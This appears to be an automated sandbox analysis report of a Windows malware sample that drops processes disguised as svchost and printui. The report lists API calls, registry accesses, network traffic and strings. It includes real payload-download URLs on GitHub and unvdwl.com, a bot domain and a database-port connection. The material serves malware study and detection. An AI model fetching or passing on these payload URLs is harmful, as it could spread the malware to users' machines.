    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8358580 CRYPTO_malloc,CRYPTO_realloc,memset,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,ERR_new,ERR_set_mark,EVP_KEYMGMT_fetch,X509_STORE_CTX_get0_param,OBJ_create,OBJ_txt2nid,OBJ_txt2nid,OBJ_nid2obj,OBJ_create,OBJ_create,OBJ_create,OBJ_txt2nid,OBJ_txt2nid,OBJ_txt2nid,OBJ_add_sigid,EVP_KEYMGMT_free,ERR_pop_to_mark,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,55_2_00007FF8B8358580
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83BC5A0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_memdup,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,55_2_00007FF8B83BC5A0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83425A0 CRYPTO_strdup,CRYPTO_free,55_2_00007FF8B83425A0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83645A0 BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,CRYPTO_free,CRYPTO_strdup,55_2_00007FF8B83645A0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83825B0 OPENSSL_cleanse,CRYPTO_free,55_2_00007FF8B83825B0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8354660 CRYPTO_free,CRYPTO_malloc,memcpy,55_2_00007FF8B8354660
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B837E660 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,55_2_00007FF8B837E660
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B834C610 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_free,OPENSSL_sk_new_null,OPENSSL_sk_push,ERR_new,ERR_set_debug,ERR_set_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,55_2_00007FF8B834C610
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A2630 CRYPTO_memdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,55_2_00007FF8B83A2630
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8382630 OPENSSL_cleanse,CRYPTO_free,55_2_00007FF8B8382630
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B838E6D0 CRYPTO_malloc,55_2_00007FF8B838E6D0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8382740 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_zalloc,OPENSSL_cleanse,CRYPTO_free,55_2_00007FF8B8382740
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8380770 CRYPTO_clear_free,CRYPTO_free,55_2_00007FF8B8380770
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B833E700 CRYPTO_malloc,OPENSSL_sk_find,CRYPTO_free,ERR_new,ERR_set_debug,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,55_2_00007FF8B833E700
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B837C700 CRYPTO_malloc,memcmp,memcpy,memcpy,55_2_00007FF8B837C700
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8338720 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,55_2_00007FF8B8338720
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B838E730 CRYPTO_free,55_2_00007FF8B838E730
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83867D1 BIO_puts,BIO_puts,CRYPTO_zalloc,BIO_printf,BIO_printf,BIO_printf,BIO_printf,BIO_printf,BIO_printf,CRYPTO_free,BIO_puts,55_2_00007FF8B83867D1
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83807D0 CRYPTO_malloc,memcpy,CRYPTO_free,55_2_00007FF8B83807D0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B837A7D0 OPENSSL_LH_set_down_load,OPENSSL_LH_doall_arg,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free,55_2_00007FF8B837A7D0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83AC7E0 ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,BN_num_bits,BN_bn2bin,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_clear_free,55_2_00007FF8B83AC7E0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83327F0 DeleteCriticalSection,CRYPTO_free,55_2_00007FF8B83327F0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B838E790 CRYPTO_free,55_2_00007FF8B838E790
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83927B0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,55_2_00007FF8B83927B0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8354840 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,55_2_00007FF8B8354840
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B838A850 CRYPTO_free,CRYPTO_free,CRYPTO_free,55_2_00007FF8B838A850
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8388850 CRYPTO_realloc,55_2_00007FF8B8388850
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8332860 CRYPTO_zalloc,InitializeCriticalSection,55_2_00007FF8B8332860
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8384800 OPENSSL_LH_delete,CRYPTO_free,55_2_00007FF8B8384800
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B8338812 ERR_set_debug,CRYPTO_free,CRYPTO_strdup,ERR_new,55_2_00007FF8B8338812
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B837E810 CRYPTO_zalloc,55_2_00007FF8B837E810
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83A2880 CRYPTO_free,CRYPTO_free,CRYPTO_free,55_2_00007FF8B83A2880
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B833E880 CRYPTO_THREAD_run_once,55_2_00007FF8B833E880
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83BC890 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,EVP_PKEY_CTX_set_rsa_padding,OSSL_PARAM_construct_uint32,OSSL_PARAM_construct_uint32,OSSL_PARAM_construct_end,EVP_PKEY_CTX_set_params,EVP_PKEY_decrypt,OPENSSL_cleanse,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_CTX_free,55_2_00007FF8B83BC890
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83BA8B0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,memcmp,OPENSSL_sk_num,OPENSSL_sk_value,ERR_new,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_dup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_free,ERR_new,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,55_2_00007FF8B83BA8B0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B835A8B0 EVP_PKEY_new,CRYPTO_malloc,CRYPTO_malloc,ERR_set_mark,EVP_PKEY_set_type,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_CTX_free,OBJ_txt2nid,OBJ_txt2nid,OBJ_txt2nid,ERR_pop_to_mark,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,55_2_00007FF8B835A8B0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B83768B0 CRYPTO_zalloc,CRYPTO_free,55_2_00007FF8B83768B0
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8B91704A6 wcschr,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcschr,_wcsdup,CertOpenStore,GetLastError,free,free,free,free,CryptStringToBinaryW,free,CertFindCertificateInStore,free,calloc,CertFreeCertificateContext,CertCloseStore,free,fseek,ftell,fread,fclose,fseek,malloc,fclose,free,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strtol,strchr,strncmp,strncmp,strncmp,strchr,CertFreeCertificateContext,free,free,55_2_00007FF8B91704A6
    Source: dYUteuvmHn.exe, 00000000.00000000.2047560018.00007FF71278E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_f64ccbdd-c
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: mov dword ptr [rbp+04h], 424D53FFh5_2_00007FF8A9348DE0
    Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.5:49706 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.5:49712 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.5:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.5:49718 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.5:49724 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.5:49728 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.5:49731 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.5:49751 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.5:49759 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49978 version: TLS 1.2
    Source: dYUteuvmHn.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: dYUteuvmHn.exe
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: dYUteuvmHn.exe
    Source: Binary string: C:\Users\Psiko\software\other\installs bot project\bot_av\build\bot_av.pdb source: bav64.exe, 00000043.00000002.3295608611.00007FF67B99E000.00000002.00000001.01000000.00000018.sdmp
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: svchost.exe, 00000037.00000002.3296551400.00007FF8A7B8B000.00000002.00000001.01000000.00000014.sdmp
    Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdb source: svchost.exe, 00000037.00000002.3297511703.00007FF8B90D8000.00000002.00000001.01000000.00000010.sdmp, libpq.dll.39.dr
    Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdbJJ source: svchost.exe, 00000037.00000002.3297511703.00007FF8B90D8000.00000002.00000001.01000000.00000010.sdmp, libpq.dll.39.dr
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: dYUteuvmHn.exe
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb source: svchost.exe, 00000037.00000002.3297336393.00007FF8B83C0000.00000002.00000001.01000000.00000012.sdmp
    Source: Binary string: PrintUI.pdb source: curlapp64.exe, 00000005.00000003.2494116424.0000022DE271C000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000003.2588007028.0000021656B8E000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 0000000B.00000003.2664811159.000002552EF01000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 00000023.00000000.2665887118.00007FF7ECF42000.00000002.00000001.01000000.00000008.sdmp, printui.exe, 00000024.00000000.2667340965.00007FF7ECF42000.00000002.00000001.01000000.00000008.sdmp, printui.exe, 00000027.00000002.3135736829.00007FF7ECF42000.00000002.00000001.01000000.00000008.sdmp, printui.exe, 00000027.00000000.2670102378.00007FF7ECF42000.00000002.00000001.01000000.00000008.sdmp
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb{{ source: svchost.exe, 00000037.00000002.3297336393.00007FF8B83C0000.00000002.00000001.01000000.00000012.sdmp
    Source: Binary string: C:\Users\Psiko\software\other\installs bot project\bot_av\build\bot_av.pdb8 source: bav64.exe, 00000043.00000002.3295608611.00007FF67B99E000.00000002.00000001.01000000.00000018.sdmp
    Source: Binary string: PrintUI.pdbGCTL source: curlapp64.exe, 00000005.00000003.2494116424.0000022DE271C000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000003.2588007028.0000021656B8E000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 0000000B.00000003.2664811159.000002552EF01000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 00000023.00000000.2665887118.00007FF7ECF42000.00000002.00000001.01000000.00000008.sdmp, printui.exe, 00000024.00000000.2667340965.00007FF7ECF42000.00000002.00000001.01000000.00000008.sdmp, printui.exe, 00000027.00000002.3135736829.00007FF7ECF42000.00000002.00000001.01000000.00000008.sdmp, printui.exe, 00000027.00000000.2670102378.00007FF7ECF42000.00000002.00000001.01000000.00000008.sdmp
    Source: C:\Windows\System32\bav64.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
    Source: C:\Windows\System32\bav64.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
    Source: C:\Windows\System32\bav64.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
    Source: C:\Windows\System32\bav64.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
    Source: C:\Windows\System32\bav64.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
    Source: C:\Windows\System32\bav64.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
    Source: C:\Windows\System32\bav64.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
    Source: C:\Windows\System32\bav64.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
    Source: C:\Windows\System32\bav64.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
    Source: C:\Windows\System32\bav64.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
    Source: C:\Windows\System32\bav64.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
    Source: C:\Windows\System32\bav64.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
    Source: C:\Windows\System32\bav64.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
    Source: C:\Windows\System32\bav64.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
    Source: C:\Windows\System32\bav64.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
    Source: C:\Windows\System32\bav64.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
    Source: C:\Users\user\Desktop\dYUteuvmHn.exeCode function: 0_2_00007FF712785E64 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF712785E64
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF6CABFD2A8 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_00007FF6CABFD2A8
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D3A450 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,55_2_00007FF8A7D3A450
    Source: C:\Windows\System32\svchost.exeCode function: 55_2_00007FF8A7D3A30C FindClose,FindFirstFileExW,GetLastError,55_2_00007FF8A7D3A30C
    Source: global trafficTCP traffic: 192.168.2.5:49964 -> 188.116.21.204:5432
    Source: global trafficHTTP traffic detected: GET /botrunvd01/botdwl/raw/main/botprnt.dat HTTP/1.1Host: github.comAccept: */*
    Source: global trafficHTTP traffic detected: GET /botrunvd01/botdwl/main/botprnt.dat HTTP/1.1Host: raw.githubusercontent.comAccept: */*
    Source: global trafficHTTP traffic detected: GET /botrunvd01/botdwl/raw/main/botprnt.dat HTTP/1.1Host: github.comAccept: */*
    Source: global trafficHTTP traffic detected: GET /botrunvd01/botdwl/main/botprnt.dat HTTP/1.1Host: raw.githubusercontent.comAccept: */*
    Source: global trafficHTTP traffic detected: GET /botrunvd01/botdwl/raw/main/botprnt.dat HTTP/1.1Host: github.comAccept: */*
    Source: global trafficHTTP traffic detected: GET /botrunvd01/botdwl/main/botprnt.dat HTTP/1.1Host: raw.githubusercontent.comAccept: */*
    Source: Joe Sandbox ViewIP Address: 185.199.109.133 185.199.109.133
    Source: Joe Sandbox ViewIP Address: 185.199.109.133 185.199.109.133
    Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
    Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
    Source: Joe Sandbox ViewJA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
    Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
    Source: unknownDNS query: name: ipinfo.io
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8A9305CE0 recv,5_2_00007FF8A9305CE0
    Source: global trafficHTTP traffic detected: GET /botrunvd01/botdwl/raw/main/botprnt.dat HTTP/1.1Host: github.comAccept: */*
    Source: global trafficHTTP traffic detected: GET /botrunvd01/botdwl/main/botprnt.dat HTTP/1.1Host: raw.githubusercontent.comAccept: */*
    Source: global trafficHTTP traffic detected: GET /botrunvd01/botdwl/raw/main/botprnt.dat HTTP/1.1Host: github.comAccept: */*
    Source: global trafficHTTP traffic detected: GET /botrunvd01/botdwl/main/botprnt.dat HTTP/1.1Host: raw.githubusercontent.comAccept: */*
    Source: global trafficHTTP traffic detected: GET /botrunvd01/botdwl/raw/main/botprnt.dat HTTP/1.1Host: github.comAccept: */*
    Source: global trafficHTTP traffic detected: GET /botrunvd01/botdwl/main/botprnt.dat HTTP/1.1Host: raw.githubusercontent.comAccept: */*
    Source: global trafficDNS traffic detected: DNS query: github.com
    Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
    Source: global trafficDNS traffic detected: DNS query: rootunvbot.com
    Source: global trafficDNS traffic detected: DNS query: ipinfo.io
    Source: svchost.exe, 00000037.00000002.3292747855.0000000064953000.00000008.00000001.01000000.00000015.sdmpString found in binary or memory: http://mingw-w64.sourceforge.net/X
    Source: powershell.exe, 0000002D.00000002.2938384773.0000021FD8097000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 0000002D.00000002.2918363096.0000021FC8256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 0000002D.00000002.2918363096.0000021FC8256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 0000002D.00000002.2918363096.0000021FC8031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 0000002D.00000002.2918363096.0000021FC8256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: curlapp64.exe, 00000005.00000002.2494596778.0000022DE26CC000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000002.2588286320.0000021656B37000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 0000000B.00000002.2670992217.000002552EEA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://unvdwl.com/un2/botprnt.dat
    Source: curlapp64.exe, 0000000B.00000002.2670992217.000002552EEA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://unvdwl.com/un2/botprnt.datsInfo
    Source: curlapp64.exe, 00000008.00000002.2588286320.0000021656B37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://unvdwl.com/un2/botprnt.datsInfon
    Source: powershell.exe, 0000002D.00000002.2918363096.0000021FC8256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: svchost.exe, 00000037.00000002.3294476493.00000000682A4000.00000008.00000001.01000000.00000013.sdmpString found in binary or memory: http://www.gnu.org/licenses/
    Source: curlapp64.exe, svchost.exeString found in binary or memory: http://www.zlib.net/
    Source: dYUteuvmHn.exeString found in binary or memory: http://www.zlib.net/D
    Source: powershell.exe, 0000002D.00000002.2918363096.0000021FC8031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
    Source: powershell.exe, 0000002D.00000002.2938384773.0000021FD8097000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 0000002D.00000002.2938384773.0000021FD8097000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 0000002D.00000002.2938384773.0000021FD8097000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: curlapp64.exe, svchost.exeString found in binary or memory: https://curl.se/
    Source: dYUteuvmHn.exeString found in binary or memory: https://curl.se/V
    Source: dYUteuvmHn.exeString found in binary or memory: https://curl.se/docs/alt-svc.html
    Source: curlapp64.exe, svchost.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
    Source: curlapp64.exe, svchost.exeString found in binary or memory: https://curl.se/docs/copyright.html
    Source: dYUteuvmHn.exeString found in binary or memory: https://curl.se/docs/copyright.htmlD
    Source: dYUteuvmHn.exeString found in binary or memory: https://curl.se/docs/hsts.html
    Source: curlapp64.exeString found in binary or memory: https://curl.se/docs/hsts.html#
    Source: dYUteuvmHn.exeString found in binary or memory: https://curl.se/docs/http-cookies.html
    Source: curlapp64.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
    Source: dYUteuvmHn.exeString found in binary or memory: https://dns.google/resolve?name=
    Source: powershell.exe, 0000002D.00000002.2918363096.0000021FC8256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: curlapp64.exe, 00000005.00000002.2494596778.0000022DE26CC000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000005.00000003.2483165548.0000022DE26F2000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000005.00000003.2494142253.0000022DE26F3000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000005.00000002.2494596778.0000022DE26F3000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000003.2588031470.0000021656B68000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000002.2588286320.0000021656B68000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000003.2581660737.0000021656B67000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 00000008.00000002.2588286320.0000021656B37000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 0000000B.00000003.2664909778.000002552EEC0000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 0000000B.00000002.2671597203.000002552EED2000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 0000000B.00000003.2664931093.000002552EED1000.00000004.00000020.00020000.00000000.sdmp, curlapp64.exe, 0000000B.00000002.2670992217.000002552EEB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/botrunvd01/botdwl/raw/main/botprnt.dat
